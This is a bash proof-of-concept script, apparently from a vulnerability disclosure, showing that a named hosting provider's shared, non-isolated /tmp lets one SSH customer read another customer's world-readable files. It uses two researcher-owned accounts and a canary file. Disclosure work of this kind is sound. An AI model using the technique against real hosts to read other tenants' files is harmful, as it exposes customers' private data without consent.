#!/usr/bin/env bash
# F-01 — Cross-tenant /tmp read on alwaysdata SSH host ssh1.
# alwaysdata shares ONE /tmp (mode 1777, NOT polyinstantiated) across all
# accounts on a physical SSH host; platform default umask 022 => new /tmp
# files are world-readable (644). Any SSH customer can read another
# customer's /tmp files on the same host.
#
# Both accounts below are owned by the researcher — zero third-party data
# touched. Fill in SSH creds/keys before running.
set -euo pipefail

# --- Account A (writer): slug steve-william, uid 530469 -> host ssh1 ---
A_HOST="ssh-steve-william.alwaysdata.net"
A_USER="steve-william"

# --- Account B (reader): slug test-domain, uid 530478 (DIFFERENT tenant) -> host ssh1 ---
B_HOST="ssh-test-domain.alwaysdata.net"
B_USER="test-domain"

CANARY="/tmp/CANARY_A_secret_9f2b7c1e_ONLY_A_WROTE_THIS.txt"
SECRET="CANARY_A_secret_9f2b7c1e_ONLY_A_WROTE_THIS"

echo "=== Step 1: as Account A (${A_USER}) write world-readable canary into shared /tmp ==="
ssh "${A_USER}@${A_HOST}" "
  echo \"${SECRET} :: written by account steve-william(A) at \$(date -u) uid=\$(id -u)\" > '${CANARY}'
  chmod 644 '${CANARY}'
  echo '[A] wrote:'; stat -c '%n owner=%U mode=%a' '${CANARY}'
"

echo
echo "=== Step 2: as Account B (${B_USER}, different tenant/UID) read A's file from shared /tmp ==="
ssh "${B_USER}@${B_HOST}" "
  echo '[B] umask:'; umask
  echo '[B] stat of A-owned file:'; stat -c '%n owner=%U mode=%a' '${CANARY}'
  echo '[B] contents read cross-tenant:'; cat '${CANARY}'
"

echo
echo "Expected result: Account B prints Account A's canary line."
echo "  CANARY_A_secret_9f2b7c1e_ONLY_A_WROTE_THIS :: written by account steve-william(A) ... uid=530469"
echo "  stat from B shows owner=steve-william mode=644 -> cross-tenant read confirmed."
